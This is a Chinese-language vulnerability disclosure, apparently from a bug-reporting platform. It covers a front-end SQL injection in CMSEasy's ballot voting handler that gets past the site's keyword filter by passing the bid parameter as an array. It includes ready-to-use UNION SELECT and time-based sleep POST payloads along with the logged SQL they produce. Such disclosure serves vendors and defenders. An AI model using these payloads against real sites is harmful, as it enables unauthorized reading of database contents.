cmseasy 修复不当前台无限制select union注射(绕过webscan)

### 简要描述： cmseasy 修复不当前台无限制select union注射 ### 详细说明： 下载最新版本： ballot_act.php: ``` function index_action() { if (front::post('submit')) { if (!front::post('ballot')) { front::alert(lang('Please_select_vote')); return false; } if (config::get('checkip')) { $time=cookie::get('vttime'); if (time() -$time <config::get('timer') * 60) { front::alert(lang('You_have_voted')); return false; } } $bid=front::$post['bid']; if (is_array(front::$post['ballot'])) { $ids=implode(',',front::$post['ballot']); } else { $ids=front::$post['ballot']; } if(preg_match('/(select|union|and|\'|"|\))/i',$ids)){ exit('非法参数'); } if(preg_match('/(select|union|and|\'|"|\))/i',$bid)){ exit('非法参数'); } $where="id in($ids)"; $data='num=num+1'; $option=new option(); $option->rec_update($data,$where); $this->_table->rec_update($data,$bid); ``` 这里初步对bid 和 ids 变量做了过滤 经过分析ids变量存在缺陷，但是比较鸡肋，无从下手，我们砖头看看bid 如果bid是一个数组会发生什么事情 rec_update： ``` function rec_update($row,$where) { $tbname=$this->name; $sql=$this->sql_update($tbname,$row,$where); //echo $sql." "; return $this->query_unbuffered($sql); } ``` 在跟进到： sql_update： ``` function sql_update($tbname,$row,$where) { //var_dump($row); $sqlud=''; if (is_string($row)) $sqlud = $row.' '; else foreach ($row as $key=>$value) { if (in_array($key,explode(',',$this->getcolslist()))) { $value=$value; /*if (preg_match('/^\[(.*)\]$/',$value,$match)) $sqlud .= "`$key`"."= '".$match[1]."',"; else*/if ($value === "") $sqlud .= "`$key`= NULL, "; else $sqlud .= "`$key`"."= '".$value."',"; } } $sqlud=rtrim($sqlud); $sqlud=rtrim($sqlud,','); $this->condition($where); $sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where; //echo $sql; return $sql; } ``` 在跟进到condition函数: ``` function condition(&$condition) { if (isset($condition) &&is_array($condition)) { $_condition=array(); foreach ($condition as $key=>$value) { //$value=str_replace("'","\'",$value); $key = htmlspecialchars($key,ENT_QUOTES); $_condition[]="`$key`='$value'"; } $condition=implode(' and ',$_condition); } ``` htmlspecialchars这个函数是不对小引号做转移了 又出现自欺欺人一处 我们访问： http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index： postdata: submit=xx&ballot=1,2,3,4&bid[xxx%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=xxxxxxxxxxxxxxxxxx 这里我们只是看看能否引进来: 抓取： [<img src="https://images.seebug.org/upload/201501/2713003607751c35455508b56e7ebf8796a85d92.png" alt="58.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2713003607751c35455508b56e7ebf8796a85d92.png) 2015/1/27 12:54 UPDATE `cmseasy_ballot` SET num=num+1 WHERE `xxx`=1 UNION SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1#`='xxxxxxxxxxxxxxxxxx' 发现了没有可以无限制注射 ，简单验证一下 用时间注射 http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index postdata: submit=xx&ballot=1,2,3,4&bid[num%60%3d1%20or%20sleep/**/(5)%23]=xxxxxxxxxxxxxxxxxx 抓取： 2015/1/27 13:04 UPDATE `cmseasy_ballot` SET num=num+1 WHERE `num`=1 and sleep/**/(5)#`='xxxxxxxxxxxxxxxxxx' 成功执行 ### 漏洞证明：